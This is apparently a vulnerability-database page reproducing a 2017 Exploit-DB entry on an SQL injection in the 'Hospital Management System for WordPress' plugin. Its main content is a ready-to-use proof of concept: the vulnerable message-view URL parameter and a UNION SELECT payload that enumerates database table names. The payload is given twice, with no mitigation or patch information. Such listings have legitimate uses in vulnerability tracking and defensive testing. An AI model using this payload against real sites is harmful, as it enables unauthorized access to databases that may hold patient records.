Hospital Management System for Wordpress - SQL Injection

vendor:

Hospital Management System for Wordpress

by:

Ihsan Sencan

N/A

CVSS

N/A

SQL Injection

N/A

CWE

Product Name: Hospital Management System for Wordpress

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2017

Hospital Management System for WordPress – SQL Injection

The vulnerability allows an student members to inject sql commands.... Proof of Concept: http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL] -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+- Etc..

Mitigation:

N/A

Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Hospital Management System for Wordpress - SQL Injection
# Dork: N/A
# Date: 26.09.2017
# Vendor Homepage: http://mojoomla.com/
# Software Link: https://codecanyon.net/item/hospital-management-system-for-wordpress/12094634
# Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/hospital/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an student members to inject sql commands....
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
# 
# -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
# 
# Etc..
# # # # #